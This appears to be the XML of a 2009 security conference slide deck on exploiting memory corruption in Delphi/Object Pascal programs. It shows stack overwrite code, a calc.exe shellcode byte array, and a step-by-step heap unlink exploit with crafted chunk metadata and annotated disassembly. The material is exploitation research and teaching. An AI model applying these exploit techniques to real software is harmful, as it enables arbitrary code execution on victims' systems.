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308" r:id="rId12"/>
    <p:sldId id="270" r:id="rId13"/>
    <p:sldId id="271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274" r:id="rId24"/>
    <p:sldId id="307" r:id="rId25"/>
    <p:sldId id="296" r:id="rId26"/>
    <p:sldId id="297" r:id="rId27"/>
    <p:sldId id="263" r:id="rId28"/>
    <p:sldId id="275" r:id="rId29"/>
    <p:sldId id="286" r:id="rId30"/>
    <p:sldId id="291" r:id="rId31"/>
    <p:sldId id="292" r:id="rId32"/>
    <p:sldId id="293" r:id="rId33"/>
    <p:sldId id="278" r:id="rId34"/>
    <p:sldId id="294" r:id="rId35"/>
    <p:sldId id="295" r:id="rId36"/>
    <p:sldId id="309" r:id="rId37"/>
    <p:sldId id="276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279" r:id="rId46"/>
    <p:sldId id="280" r:id="rId47"/>
    <p:sldId id="284" r:id="rId48"/>
    <p:sldId id="288" r:id="rId49"/>
    <p:sldId id="289" r:id="rId50"/>
    <p:sldId id="281" r:id="rId51"/>
    <p:sldId id="285" r:id="rId52"/>
    <p:sldId id="28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F8F7-2CCE-4337-AA8A-FBBD5B23F12C}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>10/30/2009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78EBA-A535-4A80-ABC8-CCB9C37175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Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>delphi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pascal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0"/>
            <a:ext cx="8077200" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Ilja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sprundel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> &lt;ivansprundel@ioactive.com&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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52400"/>
            <a:ext cx="2562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Stack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426488"/>
            <a:ext cx="8763000" cy="5355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toeter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: integer;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  numbers : array[1..5] of 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i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> := 1 to 7 do</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>     numbers[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>] := $0040C9DC; // &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>end;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>const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shellcode:array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[0..124] of BYTE = ( // exec of calc.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $fc,$e8,$44,$00,$00,$00,$8b,$45,$3c,$8b,$7c,$05,$78,$01,$ef,$8b,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   $4f,$18,$8b,$5f,$20,$01,$eb,$49,$8b,$34,$8b,$01,$ee,$31,$c0,$99, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   $ac,$84,$c0,$74,$07,$c1,$ca,$0d,$01,$c2,$eb,$f4,$3b,$54,$24,$04,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $75,$e5,$8b,$5f,$24,$01,$eb,$66,$8b,$0c,$4b,$8b,$5f,$1c,$01,$eb,         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   $8b,$1c,$8b,$01,$eb,$89,$5c,$24,$04,$c3,$5f,$31,$f6,$60,$56,$64, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   $8b,$46,$30,$8b,$40,$0c,$8b,$70,$1c,$ad,$8b,$68,$08,$89,$f8,$83,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    $c0,$6a,$50,$68,$7e,$d8,$e2,$73,$68,$98,$fe,$8a,0e,$57,$ff,$e7,  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>   $63,$61,$6c,$63,$2e,$65,$78,$65,$00,$00,$00,$00,$00);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Delphi stack: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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What about the heap ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Delphi has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to do heap allocations </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>GetMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FreeMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very much like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>()/free()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> usage is slightly different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In C would look like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err="1" smtClean="0"/>
              <a:t>GetMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() fails p will be set to NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>GetMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() does not do 0 length </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>alloc’s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5029200"/>
            <a:ext cx="4724400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 GetMem(void **p, size_t len);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Delphi has an interesting heap allocator </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Very little validation done (not build for security)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Many different ways to leverage it for code exec </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Will cover a trivial unlink() case </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So it’ll look very </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-y (well, old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>glibc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Where we overwrite chunk meta data of an allocated chunk (located after ours) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Get code exec when that chunk is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>free’d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cover the following case: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229683"/>
            <a:ext cx="8229600" cy="4247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toeter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p: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PInteger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pi: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PInteger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GetMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(pi, 16);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GetMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(p, 16);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $41414141; inc(pi);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $41414141; inc(pi); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $41414141; inc(pi); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $41414141; inc(pi); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $41414141; inc(pi);  //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/>
              <a:t>slackspace</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $41414141;        //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overflow  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FreeMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(p); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> get code exec once we return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Allocated chunks seem to be at least 20 bytes long</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>An allocated chunk’s meta data is just 4 bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Field can be an offset or a pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The 4 least significant bits indicate some kind of state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basically 4 states in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FreeMem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Indicated by those bits </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Normal case  (0, 0000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Special case 1 (2, 0010)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Special case 2 (4, 0100)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Invalid chunk meta data (1,3,5,6,7)(throws exception)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This state is indicated by the 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (the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lsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can be used in any of the states)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investigated the 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> special case </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Because I saw a trivial unlink() case there </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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heap: special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special case the 4 bytes of chunk meta data are used as an offset to data describing that block and it’s relation to the heap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chunkptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> + offset) 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lsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> don’t count, so the smallest possible negative value we can enter is -16 (0xfffffff0)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heap: special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Getting control of the data that describes that block</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We can make a negative length (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>hm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, doesn’t that seem familiar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That data is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>struct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4473476"/>
            <a:ext cx="4572000" cy="23083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heap_data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u_int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> value; 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u_int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>fw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u_int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>bk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u_int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> dummy; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>};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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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Ilja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Sprundel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>IOActive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Netric</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>blogs.23.nu/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ilja</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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52400"/>
            <a:ext cx="25622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heap: special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needs its 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>st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lsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> set to indicate unlink()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Value also needs to be a small value &gt; 0xb30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Fw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will contain a pointer to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode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Bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> will contain a pointer to the saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Dunno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> what dummy is, setting it to 0 seems to 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heap: special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Unlink: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101876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004014CC  /$ 8B48 04     MOV ECX,DWORD PTR DS:[EAX+4] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> get from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>struct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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>004014CF  |. 8B10           MOV EDX,DWORD PTR DS:[EAX] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> get from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>struct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r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>004014D1  |. 39D1          CMP ECX,EDX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>004014D3  |. 8911          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MOV DWORD PTR DS:[ECX],EDX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 write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shellcode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to saved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eip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004014D5  |. 894A 04     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MOV DWORD PTR DS:[EDX+4],ECX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 write in shellcode+4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004014D8  |. 74 02          JE SHORT Project1.004014DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>004014DA  |&gt; C3             RETN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heap: special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382083"/>
            <a:ext cx="8610600" cy="4247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toeter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p: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PInteger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pi: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PInteger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GetMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(pi, 16);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GetMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(p, 16);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $41414141; inc(pi);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $00000b41; inc(pi); // need to set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to 1, needs to be small and &gt; b30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $43434343; inc(pi); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $44444444; inc(pi); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $00000000; inc(pi); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>slackspace</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fffffffa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;          // overflow, -16 with bit 4 and bit 2 set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FreeMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(p);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean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rame 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5257800" y="1828800"/>
            <a:ext cx="685800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990600" y="1828800"/>
            <a:ext cx="18288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990600" y="6477000"/>
            <a:ext cx="685800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2895600" y="2971800"/>
            <a:ext cx="2286000" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout2">
            <a:avLst>
              <a:gd name="adj1" fmla="val 20628"/>
              <a:gd name="adj2" fmla="val -446"/>
              <a:gd name="adj3" fmla="val 18750"/>
              <a:gd name="adj4" fmla="val -16667"/>
              <a:gd name="adj5" fmla="val -69660"/>
              <a:gd name="adj6" fmla="val -32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Unlink routine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unlink will garble our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode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 we’ll need to modify it a little</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The first 4 bytes are safe, the next 4 are not</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So jump over them </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x06</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x41\x41\x41\x41\x41\x41</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Red: length </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Green: jump over this, will get overwritten with saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eip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86000"/>
            <a:ext cx="8610600" cy="4247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toeter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p: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PInteger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pi: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>PInteger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GetMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(pi, 16);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GetMem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(p, 16);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $41414141; inc(pi);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $00000b41; inc(pi); // need to set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>lsb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to 1, needs to be small and &gt; b30</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $0040C9DC; inc(pi); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $0012FF8C; inc(pi); // saved </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>eip</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    pi^ := $00000000; inc(pi); // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>slackspace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pi^ := $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fffffffa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
